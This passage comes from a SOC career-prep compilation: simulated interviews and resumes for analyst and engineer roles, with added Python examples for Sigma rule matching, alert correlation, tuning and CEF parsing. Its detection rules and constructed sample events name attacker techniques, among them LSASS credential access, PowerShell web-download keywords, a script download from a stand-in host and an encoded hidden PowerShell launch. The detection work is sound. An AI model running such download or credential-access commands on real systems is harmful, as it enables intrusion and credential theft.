    - attack.t1003

This detects access attempts with elevated permissions targeting lsass.exe.

Interviewer: How do you deal with detection logic that causes alert fatigue?

Candidate: I refine logic using:

• Thresholds (e.g., >5 events per min)
• Exclusions (allowlists, safe users/tools)
• Correlation (tie process + network + user activity)
• I also track false positive rates and feedback from L1s. If alerts provide low value, I
either tune, archive or replace them with better TTP-based logic.
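The two Sigma rules quoted in this document (the LSASS access rule above and the PowerShell Web Download rule from the L2 interview) rely on three kinds of field matching: an exact value, `|contains` with a list of alternatives, and `|endswith`. The block below is an added example, not the author's material and not Sigma's own tooling: a minimal evaluator for just that subset of the selection syntax (case-insensitive, as Sigma's string matching is, with a list meaning OR within a field and fields ANDed together), run over constructed Sysmon-style events with both rules transcribed as Python dicts. It only handles rules whose condition is a single selection, which is all these two need.

```python
"""Minimal evaluator for the subset of Sigma selection syntax used by the two rules
in this document. Rules are transcribed as dicts; events are constructed records
shaped like Sysmon process_creation (Event ID 1) and process_access (Event ID 10)."""

RULES = [
    {   # Rule from the L2 interview (process_creation)
        "title": "PowerShell Web Download",
        "logsource": {"category": "process_creation", "product": "windows"},
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["Invoke-WebRequest", "iwr", "DownloadString"],
        },
        "level": "high",
    },
    {   # Rule from the L3 interview (process_access)
        "title": "Suspicious LSASS Access",
        "logsource": {"category": "process_access", "product": "windows"},
        "selection": {"TargetImage|endswith": "\\lsass.exe", "GrantedAccess": "0x1410"},
        "level": "high",
    },
]


def _value_matches(event_value, modifier, pattern):
    """Apply one Sigma modifier; comparisons are case-insensitive like Sigma's."""
    ev, pat = str(event_value).lower(), str(pattern).lower()
    if modifier == "":
        return ev == pat
    if modifier == "contains":
        return pat in ev
    if modifier == "endswith":
        return ev.endswith(pat)
    if modifier == "startswith":
        return ev.startswith(pat)
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(selection, event):
    """Every field in the selection must match; a list of patterns is an OR."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        candidates = patterns if isinstance(patterns, list) else [patterns]
        if not any(_value_matches(event[field], modifier, p) for p in candidates):
            return False
    return True


def matching_rules(rules, event):
    """Titles of rules whose logsource category and selection both fit the event."""
    return [
        r["title"] for r in rules
        if r["logsource"]["category"] == event.get("category")
        and selection_matches(r["selection"], event)
    ]


def run(rules, events):
    return [matching_rules(rules, e) for e in events]


# Constructed sample events (indexes 0 and 3 should fire, the rest should not).
SAMPLE_EVENTS = [
    {"category": "process_creation",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": 'powershell.exe -NoP -c "iwr http://example.invalid/a.ps1 -OutFile a.ps1"'},
    {"category": "process_creation",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\cleanup.ps1"},
    {"category": "process_creation",  # keyword present but Image is not powershell.exe
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c echo DownloadString"},
    {"category": "process_access", "SourceImage": "C:\\Temp\\tool.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410"},
    {"category": "process_access",  # different access mask: exact match does not fire
     "SourceImage": "C:\\Windows\\System32\\csrss.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, run(RULES, SAMPLE_EVENTS)):
        print(event.get("Image") or event.get("TargetImage"), "->", hits)
```

The last sample shows the trade-off in the LSASS rule's exact GrantedAccess match: any access mask other than 0x1410 stays silent, which is where false negatives come from and why real rules list several masks or use a broader modifier.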

SECTION 4: SCENARIO-BASED ASSESSMENT

Interviewer: Let’s walk through a scenario. You receive multiple alerts of powershell.exe
spawning from winword.exe across 3 endpoints. What do you do?

Candidate:

1. Triage: Confirm alerts are legitimate. Review process tree, command line (e.g.,
base64 encoded) and timestamps.
2. Correlate: Check whether all affected endpoints received the same Word file via
email or share.
3. Threat Intel: Decode payload, sandbox if needed (Any.Run), hash match with
VirusTotal.
4. Scope: Use EDR or SIEM to identify lateral movement or persistence.
5. Containment: Isolate machines, block indicators, notify IR.
6. Reporting: Create a detailed RCA. Map to MITRE (e.g., T1059, T1203). Recommend
awareness/training if it was a phishing attack.

Interviewer: Let’s say an attacker used certutil to download a tool and created a
scheduled task for persistence. What logs would you check?

Candidate: I’d check:

• Sysmon logs:
o Event ID 1 (Process Creation for certutil.exe)
o Event ID 3 (Network connections)
• Task Scheduler logs:
o Task registration (Event ID 106)
• Windows Security:
o New service or registry changes (Event ID 4697 or 4657)
• Persistence techniques:
o T1053.005 (Scheduled Task)
I’d also pivot to see if this TTP was isolated or part of a broader campaign.

SECTION 5: THREAT HUNTING, RED/BLUE TEAMING, TOOLS

Interviewer: Describe a real-world threat hunt you led.


Candidate: I conducted a hunt focused on T1059.003 (WMIC abuse) after discovering it in
APT reports.

• Hypothesis: Attackers may use wmic process call create for stealthy lateral
execution
• Data sources: Sysmon Event 1, Win Event Logs
• Query: WMIC with keywords like “create” or “powershell”
• Findings: One case of legacy IT script, excluded. No malicious instances, but we
added a Sigma rule and trained L1s on it.
Documented the hunt and shared it in our quarterly threat briefing.

Interviewer: Have you worked with red teams or in purple team simulations?

Candidate: Yes. I was part of a red/blue/purple exercise simulating a ransomware
incident. I:

• Validated detection gaps (missing alerts on file encryption tools)
• Tuned our rules for better coverage on vssadmin, rundll32 and wevtutil abuse
• Shared Sigma to Splunk conversion during post-mortem
It helped improve our EDR playbook and we ran table-top drills afterward.

SECTION 6: LEADERSHIP & COLLABORATION

Interviewer: How do you mentor junior analysts or manage escalations?

Candidate: I hold weekly L1 knowledge huddles covering interesting cases and detection
logic.
For escalations, I guide L1s to ask key questions (what, where, how, why) before passing
the ticket. I avoid taking over immediately; coaching through the process builds their
confidence.

Interviewer: How would you improve SOC maturity from an L3 perspective?

Candidate:

• Detection maturity: Align use cases with real threats (MITRE/CVE/Threat Intel)
• Automation: Collaborate with SOAR to auto-enrich triage
• Playbook improvement: Keep runbooks updated and tactical
• Red/blue feedback loop: After-action reviews with recommendations
• Metrics: Track MTTR, FP ratio, detection-to-containment time

SECTION 7: CLOSING QUESTIONS

Interviewer: That was excellent, Carlos. Do you have any questions for us?
Candidate: Yes, thank you. A few questions:

1. What are the main KPIs for L3 analysts here?
2. Does Cybermir Defence support contributions to open-source detection or
research?
3. What’s the growth path beyond L3, does it involve red team work, engineering or
leadership?

SOC ENGINEER RESUME

DIMITAR BERBATOV
Cybersecurity Analyst | Aspiring SOC Engineer | Detection Engineering | SIEM Development
Selangor, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/dimitarberbatov | GitHub: github.com/dimitarcyber

PROFESSIONAL SUMMARY

Security Operations professional with 3+ years of experience as an L1/L2 Cybersecurity
Analyst in a 24/7 SOC environment. Skilled in end-to-end alert triage, detection logic
tuning, log onboarding and SIEM pipeline optimisation. Adept at working with Splunk,
Wazuh and Microsoft Sentinel to create high-fidelity detections and reduce false positives.
Seeking to transition into a Cybersecurity Engineer (SOC Engineer) role to lead SIEM
deployment, rule development and operational tooling enhancements.

CURRENT POSITION

Cybersecurity Analyst (L2)
IzzmierCyber Defense Sdn Bhd – Kuala Lumpur, Malaysia
Oct 2022 – Present

• Collaborated with SOC engineering team on SIEM onboarding for 15+ log sources
including firewalls, proxies, endpoint and cloud (AWS, O365)
• Fine-tuned detection rules in Splunk and Wazuh, improving alert precision and
reducing false positives by over 35%
• Built and modified Sigma rules for ATT&CK-aligned detection use cases
• Conducted parsing validation, field extractions and log normalization (CEF, JSON,
Syslog)
• Assisted in SOAR integration for Cortex XDR alert triage automation
• Documented and maintained detection rules, use case mapping and playbooks in
Confluence
• Provided escalation guidance and supported junior analysts with investigation
workflow

Key Projects:

• Built alert correlation rule for multi-vector brute-force followed by PowerShell beacon
• Supported Sentinel rule migration and KQL query optimisation for one major enterprise
client
• Developed log onboarding checklist and mapping template for SIEM engineers

EDUCATION
Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2022 | CGPA: 3.42

CERTIFICATIONS

• CompTIA CySA+ – Cybersecurity Analyst
• Microsoft SC-200 – Security Operations Analyst
• Splunk Core Certified Power User
• TryHackMe: SIEM & Detection Engineering Labs – Completed

SKILLS MATRIX

SIEM Platforms:

• Splunk (Search Processing Language - SPL)
• Microsoft Sentinel (KQL queries, Workbook Dashboards)
• Wazuh (custom rules, log configuration)
• ArcSight (basic experience)

Detection Engineering:

• Sigma Rules (custom and from public repos)
• MITRE ATT&CK mapping
• Rule tuning & false positive reduction
• Alert suppression & correlation logic

Log Source & Parsing:

• CEF, JSON, LEEF, Syslog
• Field extractions, normalization, log validation
• Log onboarding documentation

Scripting & Automation:

• Python (IOC enrichment, alert parsing)
• PowerShell (collection script)
• SOAR (Cortex XSOAR – basic integration experience)

Threat Intelligence:

• VirusTotal, Any.Run, AbuseIPDB, MISP
• IOC enrichment and correlation

Other Tools:

• CyberChef, Git, Regex101, OSQuery, Elastic, Zeek

PROJECTS & INITIATIVES

SIEM Log Onboarding & Normalisation Framework

• Developed onboarding checklist with log validation tests
• Worked with clients to define use cases based on log availability
• Wrote regex-based field extractions in Splunk

Detection Engineering Sprint for ATT&CK Coverage

• Created 20+ custom rules for techniques such as T1059 (Command Execution),
T1078 (Valid Accounts)
• Built weekly dashboards for detection efficacy and gap analysis

Alert Enrichment using Python Scripts

• Created scripts to auto-lookup IP/domain hash on VirusTotal
• Pushed enrichment back into the alert ticket to assist triage

DOCUMENTATION & RUNBOOKS

• Maintained SIEM documentation: data sources, parsers, rule descriptions
• Authored alert tuning guides for junior analysts
• Created onboarding SOPs and troubleshooting guides for parsing issues

SOFT SKILLS & TEAM CONTRIBUTION

• Strong analytical thinking and attention to detail
• Excellent collaboration with engineering, IR and red team
• Reliable escalation handler for complex use cases
• Effective communicator in reporting detection logic to clients

SIMULATED INTERVIEW FOR A CANDIDATE APPLYING FOR THE ROLE OF CYBERSECURITY
SOC ENGINEER

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Hi Dimitar Berbatov, welcome. Can you start by telling us a bit about yourself
and why you're applying for the SOC Engineer role here at Cybermir Defence?

Candidate (Dimitar): Thank you. I’m Dimitar Berbatov, currently working as a
Cybersecurity Analyst L2 at IzzmierCyber Defense. Over the past 3 years, I’ve grown from
basic alert triage to deeper incident investigations and recently started supporting our
SIEM team with rule tuning, log onboarding and detection content development.
I'm applying for the SOC Engineer role at Cybermir Defence because I'm passionate about
building scalable, high-fidelity detection systems. I want to contribute to the engineering
backbone of a SOC, ensuring log visibility, detection quality and automation are in place to
empower the analysts.

SECTION 2: CYBERSECURITY & SOC FUNDAMENTALS

Interviewer: What do you think is the core difference between a SOC Analyst and a SOC
Engineer?

Candidate: A SOC Analyst consumes alerts and investigates threats, while a SOC
Engineer builds and maintains the systems that generate those alerts. Analysts focus on
incident detection and response, while engineers ensure the SIEM, log pipelines, detection
rules and enrichment logic are functioning properly and efficiently.

Interviewer: Can you explain the importance of log source normalization in a SIEM?

Candidate: Normalization ensures data from various log sources is structured in a
consistent way so that detection rules, dashboards and correlations can be applied across
systems. Without normalization, fields like src_ip, dest_ip or user could be named
differently or absent altogether, which would break detection logic or create visibility gaps.

Interviewer: What’s the MITRE ATT&CK framework’s role in building detection content?

Candidate: MITRE ATT&CK helps structure and prioritise detection logic based on real-
world attacker TTPs. As a SOC Engineer, I use it to align detection rules to relevant
techniques (e.g., T1059.001 for PowerShell abuse), ensuring we detect behavioural
indicators, not just IOCs. It also supports detection coverage reporting and gap analysis.

SECTION 3: SIEM & DETECTION ENGINEERING TECHNICAL ROUND

Interviewer: You’ve used Splunk before. How do you test and deploy a new detection rule?
Candidate:

1. Draft the rule based on MITRE technique or observed behaviour
2. Test it in a dev environment using known benign and simulated malicious
data
3. Backtest across 30 days of logs to check signal-to-noise ratio
4. Tune thresholds/exclusions if needed
5. Document: rule logic, purpose, false positive expectations
6. Deploy to prod in disabled or "audit-only" mode
7. Review results, then enable for active alerting after validation

Interviewer: Can you write a basic SPL detection for detecting rundll32.exe spawning
PowerShell.exe?

Candidate: Yes, a simple SPL for Splunk would look like:

index=windows sourcetype=Sysmon EventCode=1
ParentImage="*\\rundll32.exe" Image="*\\powershell.exe"
| stats count by ComputerName, ParentImage, Image, CommandLine, _time

Alternatively, I'd reverse the parent-child based on the environment and add filters to
reduce noise from legitimate admin tasks.

Interviewer: What’s your approach to building correlation logic for multi-stage attacks?

Candidate: I first map the attack stages to MITRE (e.g., Initial Access → Execution → C2).
Then, I build logic that links separate alerts or events within a time window:

• Correlate failed login + successful login + abnormal process
• Use transaction or stats commands in Splunk to stitch related events
• I also use risk-based scoring for context enrichment
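The stitching described in this answer, as an added Python example (editorial, not part of the simulated interview): a burst of Security 4625 failures, a 4624 success shortly after, and a suspicious Sysmon Event ID 1 within a window, each stage adding to a risk score. The events, thresholds, windows and stage weights are constructed assumptions; in Splunk the same logic would be a stats/transaction search keyed on host and user.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5                     # failures that count as a brute-force burst
FAIL_WINDOW = timedelta(seconds=60)
LOGON_WINDOW = timedelta(minutes=5)    # a success must follow the burst within this
EXEC_WINDOW = timedelta(minutes=10)    # an abnormal process must follow the success within this
SUSPICIOUS_CMD = ("-enc", "downloadstring", "iex(")
STAGE_SCORE = {"brute_force": 20, "logon_after_failures": 30, "suspicious_execution": 50}


def _ev(ts, event_id, user, host, **extra):
    return {"ts": ts, "event_id": event_id, "user": user, "host": host, **extra}


# Constructed event stream (Security 4625/4624 and Sysmon 1), not real telemetry.
EVENTS = [
    # jsmith on WS01: six failures in 30 s, a success, then encoded PowerShell
    *[_ev(f"2024-03-01T09:00:{s:02d}", 4625, "jsmith", "WS01", src_ip="10.0.0.55")
      for s in (1, 7, 13, 19, 25, 31)],
    _ev("2024-03-01T09:00:45", 4624, "jsmith", "WS01", src_ip="10.0.0.55"),
    _ev("2024-03-01T09:03:10", 1, "jsmith", "WS01",
        image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        cmdline="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    # svc_backup on SRV02: two typos then a success, ordinary behaviour
    _ev("2024-03-01T09:10:00", 4625, "svc_backup", "SRV02", src_ip="10.0.0.9"),
    _ev("2024-03-01T09:10:05", 4625, "svc_backup", "SRV02", src_ip="10.0.0.9"),
    _ev("2024-03-01T09:10:20", 4624, "svc_backup", "SRV02", src_ip="10.0.0.9"),
    # admin on DC01: five failures spread over 20 minutes, below the rate threshold
    *[_ev(f"2024-03-01T09:{m:02d}:00", 4625, "admin", "DC01", src_ip="10.0.0.3")
      for m in (20, 25, 30, 35, 40)],
]


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def _burst_end(fail_times):
    """Time at which FAIL_THRESHOLD failures first land inside FAIL_WINDOW, else None."""
    for i in range(len(fail_times) - FAIL_THRESHOLD + 1):
        j = i + FAIL_THRESHOLD - 1
        if fail_times[j] - fail_times[i] <= FAIL_WINDOW:
            return fail_times[j]
    return None


def correlate(events):
    """Stitch burst -> success -> suspicious process per (host, user) and score it."""
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["host"], e["user"])].append(e)
    incidents = []
    for (host, user), evs in by_key.items():
        evs.sort(key=_ts)
        burst_end = _burst_end([_ts(e) for e in evs if e["event_id"] == 4625])
        if burst_end is None:
            continue
        stages = ["brute_force"]
        success = next((e for e in evs if e["event_id"] == 4624
                        and burst_end <= _ts(e) <= burst_end + LOGON_WINDOW), None)
        if success is not None:
            stages.append("logon_after_failures")
            for e in evs:
                if (e["event_id"] == 1
                        and _ts(success) <= _ts(e) <= _ts(success) + EXEC_WINDOW
                        and any(t in e.get("cmdline", "").lower() for t in SUSPICIOUS_CMD)):
                    stages.append("suspicious_execution")
                    break
        incidents.append({"host": host, "user": user, "stages": stages,
                          "score": sum(STAGE_SCORE[s] for s in stages)})
    return sorted(incidents, key=lambda i: -i["score"])


if __name__ == "__main__":
    for inc in correlate(EVENTS):
        print(inc)
```

Only jsmith on WS01 reaches a score (all three stages, 100); svc_backup never forms a burst and admin's five failures are too spread out, which is the point of keying the threshold on a rate rather than a raw count.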

SECTION 4: SCENARIO-BASED PROBLEM SOLVING

Interviewer: Let’s simulate a case. A client complains about missed detections during a
red team test. Where do you begin?

Candidate:

1. Log Coverage Audit – Verify required log sources (e.g., EDR, Sysmon, firewall) were
ingested during the red team window
2. Detection Review – Cross-check existing rules against red team TTPs (e.g.,
T1021.001 – RDP)
3. Test Replay – Replay test artefacts or logs in dev to identify failure points
4. Gap Fix – Build or tune rules, improve field extraction if parsing failed
5. Report – Document findings, detection gaps and mitigation steps
6. Simulate & Validate – Re-run detection test to verify fix before client debrief

Interviewer: You're onboarding logs from a new Palo Alto firewall. What’s your approach?

Candidate:

1. Validate Connectivity: Ensure logs are reaching the SIEM (via Syslog/CEF)
2. Parsing Check: Confirm field mapping (e.g., src_ip, action, threat_id) using
sourcetype=paloalto
3. Field Normalisation: Ensure alignment with CIM or internal standards
4. Use Case Mapping: Determine which existing rules apply (e.g., port scans, malware
blocking)
5. Test Alerts: Trigger a sample alert using test traffic
6. Documentation: Update log onboarding matrix and SIEM inventory

Interviewer: If a detection rule is firing excessively after deployment, how would you tune
it?

Candidate:

• Review triggering data: Is it a specific system, user or process causing it?
• Whitelist known legitimate behaviour (e.g., scheduled scan by AV)
• Adjust thresholds (e.g., increase login failure count from 3 to 10)
• Add logic: Combine with rare user, geolocation mismatch or process anomalies
• Backtest again before pushing the tuned rule
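The tuning steps in this answer, and the exclusions/thresholds/feedback loop described in the earlier alert-fatigue answer, as one added Python example (editorial, not from the simulated interview): an allowlist exclusion, a per-host/user/parent suppression window, a rarity check against a baseline, and a backtest that reports volume and false-positive ratio before and after. The alert stream, the allowlisted paths, the baseline and the analysts' verdict labels are constructed assumptions.

```python
from datetime import datetime, timedelta

# Parent processes allowed to launch encoded PowerShell in this (assumed) environment.
ALLOWED_PARENTS = {
    "c:\\windows\\ccm\\ccmexec.exe",               # SCCM client (assumed legitimate here)
    "c:\\program files\\examplecorp\\agent.exe",   # fictional monitoring agent
}
SUPPRESS_WINDOW = timedelta(hours=1)   # identical host/user/parent repeats collapse into one

# 30-day baseline of (parent, user) pairs already seen with this behaviour (constructed).
BASELINE = {("c:\\windows\\explorer.exe", "helpdesk01")}


def _alert(ts, host, user, parent, verdict):
    return {"ts": ts, "host": host, "user": user, "parent": parent,
            "rule": "Encoded PowerShell Launch", "verdict": verdict}


# Constructed alert history with L1 verdicts attached ("fp" / "tp").
ALERTS = [
    # nightly SCCM job on five workstations, all confirmed benign
    *[_alert(f"2024-03-01T02:0{i}:00", f"WS0{i}", "SYSTEM",
             "C:\\Windows\\CCM\\CcmExec.exe", "fp") for i in range(1, 6)],
    # helpdesk operator re-running the same script four times in 40 minutes
    *[_alert(f"2024-03-01T10:{m:02d}:00", "WS07", "helpdesk01",
             "C:\\Windows\\explorer.exe", "fp") for m in (0, 10, 25, 40)],
    # Word spawning encoded PowerShell: the one true positive
    _alert("2024-03-01T11:03:00", "WS12", "jdoe",
           "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "tp"),
]


def _ts(a):
    return datetime.fromisoformat(a["ts"])


def tune(alerts):
    """Exclusions, then suppression of repeats, then severity from baseline rarity."""
    kept, last_seen = [], {}
    for a in sorted(alerts, key=_ts):
        parent = a["parent"].lower()
        if parent in ALLOWED_PARENTS:
            continue                                    # allowlist exclusion
        key = (a["host"], a["user"], parent)
        if key in last_seen and _ts(a) - last_seen[key] < SUPPRESS_WINDOW:
            continue                                    # suppression window
        last_seen[key] = _ts(a)
        seen_before = (parent, a["user"]) in BASELINE
        kept.append({**a, "severity": "low" if seen_before else "high"})
    return kept


def metrics(alerts):
    """Volume and false-positive ratio, using the analysts' verdict labels."""
    total = len(alerts)
    fps = sum(1 for a in alerts if a["verdict"] == "fp")
    return {"total": total, "fp_ratio": round(fps / total, 2) if total else 0.0}


def backtest(alerts):
    """Before/after comparison to run on historical alerts before pushing the tuned rule."""
    return metrics(alerts), metrics(tune(alerts))


if __name__ == "__main__":
    print(backtest(ALERTS))
```

On this history the rule goes from 10 alerts at a 90% false-positive ratio to 2 alerts at 50%, with the surviving helpdesk alert downgraded to low severity and the Word-spawned launch kept at high; the true positive is never lost, which is the check to make before any tuning is deployed.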

SECTION 5: LOG ONBOARDING & PARSING

Interviewer: Can you explain the difference between raw logs, parsed logs and normalised
logs?

Candidate:

• Raw Logs: Original, unstructured logs as sent from the source
• Parsed Logs: Structured into key-value pairs (e.g., extracted fields via regex)
• Normalised Logs: Parsed logs mapped to a common schema (e.g., CIM in Splunk),
enabling consistent query and detection logic across sources

Interviewer: Have you dealt with broken field extractions? What’s your approach?
Candidate: Yes. I use rex, spath or field extractor tools to fix broken parsing. I test regex on
sample data, apply it to the dev environment and validate with multiple log samples. I also
ensure naming follows SIEM field standards (src_ip, dest_port, etc.).
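The raw → parsed → normalised pipeline from the previous answer, and the parsing and validation checks from the firewall-onboarding answer earlier, as one added Python example (editorial, not from the simulated interview). It parses CEF lines, renames the generic CEF keys to the common-schema names used above (src_ip, dest_ip, dest_port, ...), casts ports, collapses vendor action strings, and reports which required fields the parser failed to produce. The sample lines are constructed; the extension keys are standard CEF keys, not a claim about any vendor's real field mapping.

```python
import re

# Assumed CEF-key -> common-schema mapping (CIM-style names); illustrative, not complete.
FIELD_MAP = {
    "src": "src_ip", "dst": "dest_ip", "spt": "src_port", "dpt": "dest_port",
    "proto": "transport", "act": "action", "app": "app", "rt": "event_time",
}
# Vendor action strings collapse to the two values detection rules expect.
ACTION_MAP = {"allow": "allowed", "allowed": "allowed", "permit": "allowed",
              "deny": "blocked", "drop": "blocked", "block": "blocked"}
REQUIRED = ("src_ip", "dest_ip", "dest_port", "action")
HEADER_FIELDS = ("vendor", "product", "version", "signature_id", "name", "severity")


def _unescape(value):
    """Undo CEF escaping of '=', '|' and the backslash itself."""
    return re.sub(r"\\([=|\\])", r"\1", value)


def parse_cef(line):
    """Raw -> parsed: the seven pipe-separated header fields plus the key=value extension."""
    if not line.startswith("CEF:"):
        raise ValueError("not a CEF record")
    parts = re.split(r"(?<!\\)\|", line, maxsplit=7)   # escaped '\|' does not split
    if len(parts) != 8:
        raise ValueError("malformed CEF header")
    header = {"cef_version": parts[0][4:]}
    header.update(zip(HEADER_FIELDS, (_unescape(p) for p in parts[1:7])))
    extension = {}
    # A value runs until the next ' key=' token; an escaped '\=' can never start a key,
    # so values containing spaces (rt=Mar 01 2024 ...) survive intact.
    for token in re.split(r"\s+(?=\w+=)", parts[7].strip()):
        key, _, value = token.partition("=")
        extension[key] = _unescape(value)
    return {"header": header, "extension": extension}


def normalise(parsed):
    """Parsed -> normalised: rename to the common schema, cast ports, map actions."""
    ext = parsed["extension"]
    out = {"vendor": parsed["header"]["vendor"], "product": parsed["header"]["product"]}
    for cef_key, name in FIELD_MAP.items():
        if cef_key in ext:
            out[name] = ext[cef_key]
    for port in ("src_port", "dest_port"):
        if port in out:
            out[port] = int(out[port])
    if "action" in out:
        out["action"] = ACTION_MAP.get(out["action"].lower(), "unknown")
    # Custom string fields carry their own label: csNLabel=Rule csN=<value>.
    for n in range(1, 7):
        label = ext.get(f"cs{n}Label")
        if label and f"cs{n}" in ext:
            out[label.lower().replace(" ", "_")] = ext[f"cs{n}"]
    return out


def validate(normalised):
    """Onboarding check: required schema fields the parser did not produce."""
    return [f for f in REQUIRED if f not in normalised]


def onboard(line):
    """Raw -> parsed -> normalised, plus the list of missing required fields."""
    normalised = normalise(parse_cef(line))
    return normalised, validate(normalised)


# Constructed sample lines in CEF shape (not real firewall output).
LINES = [
    "CEF:0|Palo Alto Networks|PAN-OS|10.1|TRAFFIC|end|3|rt=Mar 01 2024 09:15:22 "
    "src=10.1.2.3 dst=203.0.113.7 spt=51234 dpt=443 proto=tcp act=allow app=ssl "
    "cs1Label=Rule cs1=Allow Outbound Web",
    "CEF:0|Palo Alto Networks|PAN-OS|10.1|THREAT|vulnerability|8|src=198.51.100.9 "
    "dst=10.1.2.50 proto=tcp act=drop cs1Label=Rule cs1=Block\\=Inbound",
]

if __name__ == "__main__":
    for line in LINES:
        print(onboard(line))
```

The second line deliberately lacks a destination port, so validate() reports dest_port missing: that is the gap a log onboarding checklist should catch before any port-based rule is trusted on the new source.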

SECTION 6: COLLABORATION & DOCUMENTATION

Interviewer: How do you work with analysts to improve detection logic?

Candidate: I hold regular review sessions with L1/L2s to gather feedback on noisy rules. I
look at:

• False positive trends
• Analyst triage comments
• Alert suppression patterns
This helps prioritise tuning or redesign. Collaboration also ensures the detection
makes sense to those working on the front line.

Interviewer: How do you ensure proper documentation for long-term SOC
maintainability?

Candidate: Every detection rule I build includes:

• Rule name, ID, MITRE mapping
• Description, logic explanation
• False positive expectations
• Related playbook/runbook
I store these in Confluence or Git for version control and knowledge transfer.

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thank you, Dimitar. Do you have any questions for us?

Candidate: Yes, thank you:

1. Does Cybermir Defence use a detection-as-code approach (e.g., versioning rules in
Git)?
2. What’s the roadmap for your SIEM platform, are you migrating or hybridising with
cloud-native solutions?
3. Will the SOC Engineer role be involved in red/blue validation and purple team
exercises?

CYBERSECURITY ANALYST L2 RESUME

PATRICE EVRA
Cybersecurity Analyst | Threat Intelligence-Focused | MITRE ATT&CK Mapping | IOC & TTP
Enrichment
Kuala Lumpur, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/patriceevra | GitHub: github.com/patricecyber

PROFESSIONAL SUMMARY

Experienced L2 Cybersecurity Analyst with 4+ years in SOC operations, now transitioning
into Threat Intelligence. Skilled in alert investigations, IOC enrichment, malware analysis
and adversary tracking using frameworks like MITRE ATT&CK. Adept at working with threat
intel platforms (VirusTotal, MISP, Group-IB), performing TTP profiling and delivering client-
facing threat reports. Seeking an L3 Analyst (CTI) role to support threat actor tracking,
detection content enhancement and intelligence-driven defence.

CURRENT POSITION

Cybersecurity Analyst – Level 2 (CTI-Embedded Role)
IzzmierCyber Defense Sdn Bhd – Cyberjaya, Malaysia
Aug 2022 – Present

• Led escalation investigations involving APT-style activities, credential harvesting
and data exfiltration attempts
• Performed deep enrichment of IOCs using VirusTotal, AbuseIPDB and URLScan to
track infrastructure reuse
• Created threat actor profiles based on TTP correlations from internal and open-
source data
• Produced tactical and operational threat reports for internal SOC and clients,
mapped to MITRE ATT&CK
• Collaborated with threat intel team to improve detection rules based on emerging
malware behaviours
• Engaged in malware sandbox analysis (Any.Run, Joe Sandbox) and documented key
artefacts
• Maintained a living IOC repository and built custom YARA rules for recurring threats

Key Achievements:

• Identified and documented a phishing campaign linked to a known South-East Asia
threat cluster
• Co-authored monthly intelligence bulletins for MSSP clients with technical and
executive summaries
• Developed a heat map dashboard of top TTPs detected in customer environments
(mapped to ATT&CK)

EDUCATION

Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2021 | CGPA: 3.45

CERTIFICATIONS

• CompTIA CySA+ – Cybersecurity Analyst
• Threat Intelligence Analyst – EC-Council CTIA
• MITRE ATT&CK Cyber Threat Intelligence Training (MITRE Engenuity)
• TryHackMe – Threat Intelligence & Malware Analysis Path (Completed)

SKILLS & TOOLS

Threat Intelligence Platforms

• MISP, VirusTotal, Group-IB, IBM X-Force, AlienVault OTX

Malware & IOC Analysis

• Any.Run, Hybrid Analysis, Intezer, CyberChef, YARA, URLScan

Reporting & Frameworks

• MITRE ATT&CK, VERIS, STIX/TAXII, TLP Classification

SIEM & Log Analysis

• Splunk, Wazuh, Sentinel (IOC pivoting & detection support)

Others

• Sigma Rules (for TI-enhanced detections), KQL, Python (IOC parsing scripts),
GitHub IOC automation, ATT&CK Navigator

PROJECTS & INITIATIVES

Threat Actor Infrastructure Tracker (Internal Project)

• Developed internal tracker for recurring IPs/domains associated with phishing &
malware delivery
• Integrated into SOC workflows for IOC correlation and enrichment

MITRE ATT&CK Coverage Heatmap

• Created dashboard in ATT&CK Navigator based on observed techniques across 20+
clients
• Helped prioritise detection engineering for high-frequency TTPs

YARA Rule Contribution for Macro-Based Malware

• Authored YARA signatures to detect malicious VBA macros
• Deployed in sandbox and tested against public samples

TYPICAL CTI WORK OUTPUT

• IOC Enrichment Reports: Containing pivoted data, source attribution and timeline
• Threat Briefs: Monthly PDF reports summarising regional threats and emerging
actor activity
• TTP Analysis: ATT&CK-mapped profiles based on internal detection trends
• Playbook Support: Provided intel for IR team to enhance phishing response SOPs

COLLABORATION & KNOWLEDGE SHARING

• Worked closely with red team to document known post-exploitation C2 behaviours
• Provided threat briefings to internal L1/L2 teams on new phishing kits and delivery
methods
• Shared detection gaps with detection engineering team and contributed Sigma
rules

SIMULATED INTERVIEW FOR A CANDIDATE APPLYING FOR A CYBERSECURITY
ANALYST L3 – CYBER THREAT INTELLIGENCE (CTI) ROLE

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Welcome, Patrice! Let’s start with a brief introduction. Can you tell us about
yourself and what motivated you to apply for this CTI L3 role at Cybermir Defence?

Candidate (Patrice):
Thank you. I’m Patrice Evra, currently a Cybersecurity Analyst L2 embedded in a CTI-
supporting role at IzzmierCyber Defense. Over the last 4 years, I’ve transitioned from
traditional SOC analysis into supporting intelligence-driven investigations, enriching IOCs,
tracking campaigns and building threat actor profiles aligned with MITRE ATT&CK.
